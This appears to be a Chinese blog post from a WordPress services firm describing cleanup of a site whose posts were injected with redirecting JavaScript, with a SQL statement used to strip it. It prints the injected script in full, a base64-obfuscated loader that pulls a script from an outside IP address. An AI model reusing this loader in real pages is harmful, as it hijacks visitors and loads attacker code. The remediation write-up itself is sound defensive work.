WordPress 注入 攻擊

前幾天一位老哥的網(wǎng)站上的文章末尾,全部被注入了一個JS代碼,進入文章頁時會強制跳轉,代碼如下

 <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script><!--/codes_iframe-->

WordPress被SQL注入攻擊了怎么辦?

我去數(shù)據(jù)庫中查看,在wp_post表的wp_content字段中,也確實發(fā)現(xiàn)了這個代碼,但是,在數(shù)據(jù)庫搜索這個腳本時,base64后面的字符串每個文章都是不一樣的,那就無法使用替代/刪除的辦法了。要是手動刪除2000多個帖子,要刪到猴年馬月去。最終查詢了N多資料后,再國外的一個論壇上找到了解決辦法。

UPDATE wp_posts SET post_content =
 SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1)
 WHERE LOCATE('<!--codes_iframe-->', post_content) >0;

最終使用這行命令清除了2000+文章的惡意腳本

WordPress被SQL注入攻擊了怎么辦?

服務范圍:WordPress搭建、WordPress主題開發(fā)、WordPress二次開發(fā)、WordPress插件開發(fā)
其它服務:網(wǎng)站建設、企業(yè)郵箱、數(shù)字證書ssl、400電話、
技術標簽:企業(yè)網(wǎng)站、外貿網(wǎng)站、外貿商城、其它問題
聯(lián)系方式:電話:18696588163 微信同號

相似內容
企業(yè)網(wǎng)站定制

企業(yè)網(wǎng)站定制 根據(jù)企業(yè)需求,量身定制設計

企業(yè)網(wǎng)站定制:2800元起
添加微信 請說明來意
聯(lián)系我們
站內搜索 MORE+

24小時服務熱線 18696588163
創(chuàng)意化數(shù)字品牌整合網(wǎng)絡營銷
營銷網(wǎng)站讓你坐等商機坐傭客戶,Rss

版權所有:重慶安菲科技有限公司

版權所有:重慶安菲科技有限公司
友情連接link: